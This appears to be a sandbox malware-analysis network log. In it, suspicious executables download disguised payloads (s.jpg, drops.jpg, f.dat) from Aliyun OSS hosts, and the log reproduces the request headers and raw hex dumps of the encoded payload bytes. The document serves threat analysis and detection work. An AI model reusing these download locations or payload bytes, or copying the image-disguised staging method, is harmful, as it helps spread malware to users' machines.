                                                                                      2025-01-09 00:53:09 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                                                      Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                                                      2025-01-09 00:53:09 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                                      Data Ascii: ,$LDld=5}u]U
                                                                                      2025-01-09 00:53:09 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                                                                      Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                                                      2025-01-09 00:53:09 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 a4 d9 5e 12
                                                                                      Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS^


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.44974459.110.190.444437572C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:53:11 UTC111OUTGET /s.jpg HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:53:11 UTC543INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:53:11 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 8299
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1DF75E34143331E8C9F9
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                                                      Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 692387538176721524
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000104
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                                                      x-oss-server-time: 4
                                                                                      2025-01-09 00:53:11 UTC3553INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                      Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                      2025-01-09 00:53:11 UTC4096INData Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5
                                                                                      Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                                                      2025-01-09 00:53:11 UTC650INData Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90
                                                                                      Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.450010118.178.60.94435776C:\Users\user\Documents\BEqRkb.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:54:15 UTC114OUTGET /drops.jpg HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:54:16 UTC545INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:16 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 37274
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E38482D37303214142E
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                                      Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 9193697774326766004
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000105
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                                      x-oss-server-time: 8
                                                                                      2025-01-09 00:54:16 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                                                      Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                                                      2025-01-09 00:54:16 UTC4096INData Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc
                                                                                      Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                                                      2025-01-09 00:54:16 UTC4096INData Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5
                                                                                      Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                                                      2025-01-09 00:54:16 UTC4096INData Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38
                                                                                      Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw98
                                                                                      2025-01-09 00:54:16 UTC4096INData Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56
                                                                                      Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAqV
                                                                                      2025-01-09 00:54:16 UTC4096INData Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb
                                                                                      Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                                                      2025-01-09 00:54:16 UTC4096INData Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3
                                                                                      Data Ascii: ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                                                      2025-01-09 00:54:16 UTC4096INData Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39
                                                                                      Data Ascii: t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
                                                                                      2025-01-09 00:54:16 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                                                      Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                                                      2025-01-09 00:54:16 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                                                      Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.450011118.178.60.94435776C:\Users\user\Documents\BEqRkb.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:54:19 UTC110OUTGET /f.dat HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:54:19 UTC558INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:19 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 879
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E3B6FB42B3830D080E8
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "E54C4296F011EC91D935AA353C936E34"
                                                                                      Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 11142793972884948456
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000113
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                                                      x-oss-server-time: 2
                                                                                      2025-01-09 00:54:19 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
